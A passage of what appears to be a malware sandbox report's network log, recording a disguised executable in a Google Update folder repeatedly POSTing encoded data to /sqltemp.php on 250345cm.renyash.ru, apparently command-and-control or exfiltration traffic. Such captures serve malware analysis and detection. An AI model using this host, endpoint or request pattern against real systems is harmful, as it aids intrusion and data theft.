                                                                                                                  Data Ascii: VT_PT[QQXVRYV[YW[[TXUYP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$: <-\$>#8- -8(;*$Z!2<(&1?;-:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:21.609236002 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:21.784347057 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Sd6QxCFuOWxURmHvPNQzo2F8jzK%2F5%2Fbi%2BvypDtgNJ7jhw5QbpjzNOQC67znjE2UBUjVVvjJeAYqTY40lxa7UBWuCMa5xzXyKdaeAEURa2G%2FSZp3NxtDWy4UY4csCZfvhckRD13G"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36547cc038ca2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3289&min_rtt=2006&rtt_var=3319&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=118940&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  93192.168.2.662732104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:21.909168959 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:22.266801119 CET1124OUTData Raw: 56 55 5f 54 51 5d 54 53 58 56 52 59 56 5c 59 51 5b 5a 54 5c 55 59 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_TQ]TSXVRYV\YQ[ZT\UYP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$9Y /$= /:=R!=0<4=>#!4?!B&,+T:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:22.357624054 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:22.531091928 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwwze13lOkYWuqyJkYD8PYzYxmqKGmgro9hD%2FElHpYz3cGl534Abb0vKnm%2B9lKaowAMy0VyVDZ0GYnwvwnXrm3sW6MVDl2FxomX3xGiDWv516lUWYcuJXQunAb1CxF0SAtltg42l"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3654c7f795e7a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2389&min_rtt=2229&rtt_var=1157&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=415362&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  94192.168.2.662733104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:22.660137892 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:23.017584085 CET1124OUTData Raw: 56 50 5f 52 54 59 51 57 58 56 52 59 56 5a 59 53 5b 5b 54 5a 55 5c 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_RTYQWXVRYVZYS[[TZU\PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^&?X"<!\3;,*9#(?*?R).?#"/Y+;5E1/R.&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:23.113488913 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:23.362490892 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sttTIhuq5ziWPpe6rL%2FZQmlCaTvB7JEk0dBhWiPvn%2BEunjSiyBk4gRzz3hbiyICXsk2%2BqzFGSs26Itdk5XTvEPfx%2FlzJ%2FDOvvXJ%2FOOMBttTtDuP5AARBpsvyJyjm60TzbTjTyp2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365512c4b7cf0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4874&min_rtt=1953&rtt_var=6575&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57652&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  95192.168.2.662734104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:23.488105059 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:23.844902992 CET1124OUTData Raw: 56 56 5f 53 54 58 51 57 58 56 52 59 56 5e 59 55 5b 52 54 5f 55 5a 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_STXQWXVRYV^YU[RT_UZPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3>#/)%-489" .;?$=4 <(*&?7.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:23.931265116 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:24.194370985 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3trBkbC55NggG6bN9L0jyuRE1wmPMehoI5xzGtdSHLBy%2FjgalWrQxLvbjqqsSRubHYI4HJEO70sFhRr6d9g6l%2F2uH5Pk6HJgjbiu7K72HZB7KdfZsFw8g893OujQ%2Bbh47Hmh39QY"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365564bca5e80-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2316&min_rtt=1641&rtt_var=1966&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=207239&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  96192.168.2.662735104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:24.420490980 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:24.766701937 CET1124OUTData Raw: 56 55 5f 53 51 5d 54 56 58 56 52 59 56 5c 59 50 5b 5b 54 51 55 5c 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_SQ]TVXVRYV\YP[[TQU\PTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0?["/1'@8.4=0+)U*>7+(;:&Y7-:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:24.859992027 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  97192.168.2.662736104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:25.085496902 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:25.438642979 CET1964OUTData Raw: 53 55 5f 53 54 5c 51 50 58 56 52 59 56 5f 59 54 5b 59 54 5d 55 55 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_ST\QPXVRYV_YT[YT]UUPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'=#,"$<.:7>3(>Y!17](;E1/R:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:25.548192978 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:25.801918983 CET954INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2FluDovXkstYOxLhlQvjislLveS6acTSi6lOpO9YWneuYkRd0QrrmxhhZekb4NqvDX1N128rxtpLgOZ87WkytFKm8SoBJy9a9brqF%2BkD8mFLJaWscyd7oznyBDb2MIUCQcKGzE%2BE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365605a73c407-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3061&min_rtt=1472&rtt_var=3731&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=102903&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 09 29 3e 2d 0f 26 54 30 10 2b 13 20 0b 26 2d 31 02 29 3b 31 00 26 3d 27 11 3e 5f 3c 02 35 2c 07 58 31 38 0d 00 37 5b 24 01 27 24 2b 59 05 1c 23 1c 22 59 28 58 3d 03 38 04 25 3f 0c 05 33 2e 0e 1b 2b 2b 30 1e 22 28 20 07 33 2d 3c 5d 29 03 37 0a 26 3c 01 5f 2e 01 25 1d 24 10 2c 54 00 11 26 55 25 31 16 5d 23 24 3b 02 35 21 29 5b 25 0a 04 53 25 02 3b 54 23 29 25 06 32 0b 23 58 23 20 21 07 25 2b 25 5b 34 3e 2f 1a 28 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&)>-&T0+ &-1);1&='>_<5,X187[$'$+Y#"Y(X=8%?3.++0"( 3-<])7&<_.%$,T&U%1]#$;5!)[%S%;T#)%2#X# !%+%[4>/(.%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  98192.168.2.662737104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:25.203449011 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:25.548065901 CET1124OUTData Raw: 53 50 5f 51 51 58 51 57 58 56 52 59 56 5e 59 55 5b 58 54 58 55 58 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_QQXQWXVRYV^YU[XTXUXPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?:7?!_0-?E/7/(_?V)><X 2#Z+%<'-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:25.647399902 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:25.817183971 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98EcbIoHvi6%2Bgh7dBzrLSiTKxCMv3DiHbg0cF6D3VHH8H09l19I0wmtVVOWuApOpDpxXqe3OwT2zcHBVB66GkBtKflGisQd4zfM4dw%2FKN8qkCI5KOVy0MkpT0gSPhDnPGTAXvBso"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365610a4a0f80-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3862&min_rtt=1479&rtt_var=5321&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=71066&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  99192.168.2.662738104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:25.940326929 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:26.297955990 CET1124OUTData Raw: 56 53 5a 57 54 51 54 57 58 56 52 59 56 5e 59 55 5b 52 54 50 55 58 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VSZWTQTWXVRYV^YU[RTPUXPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$) !_3>;C.:W ><Z*)*=(]#?(!A1/#V-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:26.384270906 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:26.567681074 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMFkEiE31746LEZ%2F1JPPrj47SXDqyd0OMR60xbJ5AHM8WQ0O2ugPzQFbDJabxj6oFcQUvaXO%2BwAf0ndPgyA7cmG8ghdahrx%2BTjk%2F0ABwRR0JhbInG3r5S8jNHrbaiUsR6Vx8wCNL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3656598e94308-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2460&min_rtt=1777&rtt_var=2033&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=201490&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  100192.168.2.662739104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:26.689188004 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:27.070770025 CET1124OUTData Raw: 53 57 5f 5c 54 50 54 50 58 56 52 59 56 51 59 52 5b 5e 54 5d 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_\TPTPXVRYVQYR[^T]UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&/-X ,-^0.D/=W >$^?+R*X$X 17]*+"2Y<.:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:27.143794060 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:27.424130917 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PRm1K7v%2BJXz6eJyS1YTYGpAFVeDbE%2Fj%2F%2B6KFoAxC6IXAvTtOq6aZL3szgcTewKu9dLSdpq%2F63DoikXo5Mid5zsvX19a%2B4YvvTyrM2iHCaPBbHhDcsB8Om0xnVwIGs2I3147jpzvl"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3656a5e738c1e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4589&min_rtt=1983&rtt_var=5956&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=63942&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  101192.168.2.662740104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:27.550111055 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:27.907294035 CET1124OUTData Raw: 56 53 5f 52 51 5d 54 50 58 56 52 59 56 51 59 5f 5b 59 54 5d 55 5f 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_RQ]TPXVRYVQY_[YT]U_P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3<94%_0.?D,9#-3?:;)'4",+]=A% -&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:28.022033930 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:28.201001883 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
